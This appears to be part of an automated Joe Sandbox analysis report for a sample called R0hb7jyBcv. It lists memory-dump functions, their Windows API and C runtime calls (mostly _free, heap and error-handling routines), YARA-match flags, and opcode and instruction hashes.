Instruction ID: dc3ee3b03e60c7e8d21dae164db30604879ce625f7b49816138b11431b751431
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: 69F0E53630021597CB18AF3ADC4577ABF95FFC1714B47409EEE498B2D1C6759842CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004201AB Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754

Uniqueness

Uniqueness Score: -1.00%

Function 024E9E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,024E95DF), ref: 024E9E72

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 024EF6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 024EF818

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 962d387126977a57936c61682aa82499081f43a1d632544ec4a9e4d6dabad773
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: EE514662600E4557FF34497885567BF279AAF0220AF2B090FD883C7F91D725E98EC752

Uniqueness

Uniqueness Score: -1.00%

Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0040F5B1

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E

Uniqueness

Uniqueness Score: -1.00%

Function 00420AEA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE39 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108

Uniqueness

Uniqueness Score: -1.00%

Function 024EC3F8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 4376c9c092bdaf1dba9d0e10a7d683c9cba75b892e5842868a26efb94f199bc3
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 83912D721090A24AFF2A463EC5B413FFEE15A525A670A179FE4F3CA2C1EF24D165D620

Uniqueness

Uniqueness Score: -1.00%

Function 0040C191 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628

Uniqueness

Uniqueness Score: -1.00%

Function 024EC6B3 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 67ff84333dbec84dd97cc03194a5a37b44acd25e9800b59dd61cc31592dee396
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 3C914F721090A34AFF69427EC5B513FFEE16A526A770A079FD4F3CA2C5EF248164D620

Uniqueness

Uniqueness Score: -1.00%

Function 0040C44C Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624

Uniqueness

Uniqueness Score: -1.00%

Function 024EC131 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 2b95ef7ac97dc57319bd6d183ab51fe05d298492196c68d0249fdf85934cbc3a
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 19914D726090A34AFF2E467ED4B413EFFE15A525A670A079FD4F3CA2C1EF148165DA20

Uniqueness

Uniqueness Score: -1.00%

Function 0040BECA Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68

Uniqueness

Uniqueness Score: -1.00%

Function 024EBE87 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 0433e7bced47a9808cfe01aac0c380a7b01649f869861b45fbdf4ae8b7cb0407
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 338112722090A349EF6E467EC57453FFFE19A512A670A079FE4F3CA2C1EE149154DA20

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC20 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC

Uniqueness

Uniqueness Score: -1.00%

Function 008EFBDB Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965167409.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, Offset: 008EF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ef000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 8ab0466515027be9a8a6b8bc45027c712d08e0cc5902fdbb95d324406016e00e
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 14115E723401149FD744DE5ADC91FA673AAFB89360B398065EE04CB356E675E801C760

Uniqueness

Uniqueness Score: -1.00%

Function 024E0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 4010ad5b87d91b44eed47728c0901dc5b3dd6dc3c03c94d6b5833674dab2ba47
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 5E018F76A106048FEF21DF24C904FAF33A5EB86316F4554B6D91BE7281E7B4A9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 024F21D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024F2241
_free.LIBCMT ref: 024F2257
_free.LIBCMT ref: 024F2268
_free.LIBCMT ref: 024F2279
_free.LIBCMT ref: 024F2290
GetCPInfo.KERNEL32(?,?), ref: 024F22D8

Part of subcall function 024FB3B5: _free.LIBCMT ref: 024FB420

_free.LIBCMT ref: 024F2484
_free.LIBCMT ref: 024F2497
_free.LIBCMT ref: 024F24A5
_free.LIBCMT ref: 024F24B0
_free.LIBCMT ref: 024F24F2
_free.LIBCMT ref: 024F24FA
_free.LIBCMT ref: 024F2502
_free.LIBCMT ref: 024F250A
_free.LIBCMT ref: 024F2518

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction ID: 7f393e28fe0a20b2742a44828de64e3903126fcf81b75486a8621104a535f3a1
Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction Fuzzy Hash: 82B18171900205AFDB61DFB9C880BEFB7B5FF48304F15406EEA95A7341DBB599418B60

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B14E: _free.LIBCMT ref: 0041B1B9

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 024FF788 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 024FF7CC

Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEB38
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEB4A
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEB5C
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEB6E
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEB80
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEB92
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEBA4
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEBB6
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEBC8
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEBDA
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEBEC
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEBFE
Part of subcall function 024FEB1B: _free.LIBCMT ref: 024FEC10

_free.LIBCMT ref: 024FF7C1

Part of subcall function 024F6501: HeapFree.KERNEL32(00000000,00000000,?,024FF288,?,00000000,?,00000000,?,024FF52C,?,00000007,?,?,024FF920,?), ref: 024F6517
Part of subcall function 024F6501: GetLastError.KERNEL32(?,?,024FF288,?,00000000,?,00000000,?,024FF52C,?,00000007,?,?,024FF920,?,?), ref: 024F6529

_free.LIBCMT ref: 024FF7E3
_free.LIBCMT ref: 024FF7F8
_free.LIBCMT ref: 024FF803
_free.LIBCMT ref: 024FF825
_free.LIBCMT ref: 024FF838
_free.LIBCMT ref: 024FF846
_free.LIBCMT ref: 024FF851
_free.LIBCMT ref: 024FF889
_free.LIBCMT ref: 024FF890
_free.LIBCMT ref: 024FF8AD
_free.LIBCMT ref: 024FF8C5

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 848be9d8eb1ecc9049decd3b0add9c745dc696c3b3eaebf47448ead50e93adf7
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: A1315032600601AFDFB09E75E844B57B3EAEF80314F26546FE659E7690DF31E9448A21

Uniqueness

Uniqueness Score: -1.00%

Function 0041F521 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F565

Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9

_free.LIBCMT ref: 0041F55A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F57C
_free.LIBCMT ref: 0041F591
_free.LIBCMT ref: 0041F59C
_free.LIBCMT ref: 0041F5BE
_free.LIBCMT ref: 0041F5D1
_free.LIBCMT ref: 0041F5DF
_free.LIBCMT ref: 0041F5EA
_free.LIBCMT ref: 0041F622
_free.LIBCMT ref: 0041F629
_free.LIBCMT ref: 0041F646
_free.LIBCMT ref: 0041F65E

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9B2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E9FA
_free.LIBCMT ref: 0041EA1E
_free.LIBCMT ref: 0041EA2B
_free.LIBCMT ref: 0041EA50
_free.LIBCMT ref: 0041EA5D
_free.LIBCMT ref: 0041EA66
_free.LIBCMT ref: 0041ED44
_free.LIBCMT ref: 0041ED4C

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794

Uniqueness

Uniqueness Score: -1.00%

Function 00423226 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249

Strings

pow, xrefs: 0042332D, 004233D9, 004233EC
/BB, xrefs: 0042342E
sqrt, xrefs: 004233CD
acos, xrefs: 004233C1
log10, xrefs: 00423293, 004232E3
log, xrefs: 004232EF, 004232FB
asin, xrefs: 004233B5
exp, xrefs: 0042330E, 00423370

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: DecodePointer
String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1021189420
Opcode ID: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
Opcode Fuzzy Hash: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D

Uniqueness

Uniqueness Score: -1.00%

Function 024F6E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024F6EA0

Part of subcall function 024F6501: HeapFree.KERNEL32(00000000,00000000,?,024FF288,?,00000000,?,00000000,?,024FF52C,?,00000007,?,?,024FF920,?), ref: 024F6517
Part of subcall function 024F6501: GetLastError.KERNEL32(?,?,024FF288,?,00000000,?,00000000,?,024FF52C,?,00000007,?,?,024FF920,?,?), ref: 024F6529

_free.LIBCMT ref: 024F6EAC
_free.LIBCMT ref: 024F6EB7
_free.LIBCMT ref: 024F6EC2
_free.LIBCMT ref: 024F6ECD
_free.LIBCMT ref: 024F6ED8
_free.LIBCMT ref: 024F6EE3
_free.LIBCMT ref: 024F6EEE
_free.LIBCMT ref: 024F6EF9
_free.LIBCMT ref: 024F6F07

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: 3dcd26b4d93702da37db45cc39c6a83368c7cddbff4c044e0c332e73df5f7294
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: D711B976100109BFCF91EF96D940CD93B6AEF44354B4254AAFB189F225DA32EE50DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
